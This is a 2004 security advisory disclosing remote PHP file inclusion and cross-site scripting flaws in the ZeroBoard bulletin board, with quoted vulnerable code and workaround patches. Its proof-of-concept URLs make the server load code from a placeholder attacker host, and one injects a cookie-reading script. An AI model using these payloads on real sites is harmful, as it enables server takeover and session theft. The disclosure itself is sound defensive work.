-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site scripting vulnerabilities in ZeroBoard
Revision 1.2 Date Published: 2004-12-20 (KST) Last Update: 2004-12-24 Disclosed by SSR Team ([EMAIL PROTECTED]) Summary ======= ZeroBoard is one of widely used web BBS applications in Korea. . However, an input validation flaw can cause malicious attackers to run arbitrary commands with the privilege of the HTTPD process, which is typically run as the nobody user. Vulnerability Class =================== Implementation Error: Input validation flaw Impact ====== High : arbitrary commands execution. Affected Products ================ ZeroBoard 4.1pl4 and prior Vendor Status: NOT FIXED ======================== 2004-11-20 Vulnerabilities found. 2004-11-20 1st vendor contact, but they didn't replied. 2004-11-22 2nd vendor contact, but they didn't replied. 2004-12-13 STG Security, Inc. customer notified. 2004-12-24 Official release. Details ======= Vulnerability 1 : PHP source injection vulnerability - - ------------------------------------ - - - Proof of concept http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/ - - - Environment PHP 5.0.x php.ini : register_globals = On - - - Description As of PHP 5.0.0, file_exists() can be used with URL wrappers explained at http://www.php.net/manual/en/function.file-exists.php. Thus _zb_path parameter in outlogin.php can be easily exploited. - - - Part of vulnerable source, outlogin.php. - - ---- // ìëëë ëëíë ìì ìí if(!file_exists($_zb_path."lib.php")) { echo "ìëëë ëëíëê ìëëë"; return; } // _head.php ìì @include $_zb_path."_head.php"; } - - ---- Vulnerability 2 : PHP source injection vulnerability - - ------------------------------------ - - - Proof of concept http://[victim]/include/write.php?dir=http://[attacker]/ - - - Environment php.ini: register_globals = On - - - Reason Uninitialized $dir variable in write.php - - - Part of vulnerable source, include/write.php - - ---- include $dir."/write.php"; - - ---- Vulnerability 3 : Cross-site scripting vulnerability - - -------------------------------------- - - - Proof of concept http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)</sc ript> - - - Reason check_user_id.php doesn't validate the input value of user_id. - - - Part of vulnerable source, check_user_id.php - - ---- $user_id = trim($user_id); ... ìë ... if($check[0]) echo "$user_id ë ìë ëëë<br> ììëìëë"; else echo"$user_id ë ììíìì ììëë"; ... ìë ... - - ---- Workaround ========== Without official patches of theses vulnerability, modify the vulnerable sources as following recommendations. Vulnerability 1: As of zboard 4.1pl4 - - ---------------------------- Insert the following code at 59th line of outlogin.php, if(eregi(":\/\/",$_zb_path)) $_zb_path=""; Vulnerability 2: As of zboard 4.1pl4 - - ---------------------------- Insert the following code at 15th line of include/write.php, if(eregi(":\/\/",$dir)) $dir=""; Vulnerability 3: As of zboard 4.1pl4 - - ---------------------------- Insert the following code at 3rd line of check_user_id.php, $user_id = htmlspecialchars(trim($user_id)); Credits ====== Jeremy Bae at STG Security -----BEGIN PGP SIGNATURE----- Version: PGP 8.0 iQA/AwUBQctlEj9dVHd/hpsuEQJffgCg5fzqeXst5usCjWoK5fNV6lruGakAoJtM awAFdddxTNRwEEy4vyUuxre9 =kiqS -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
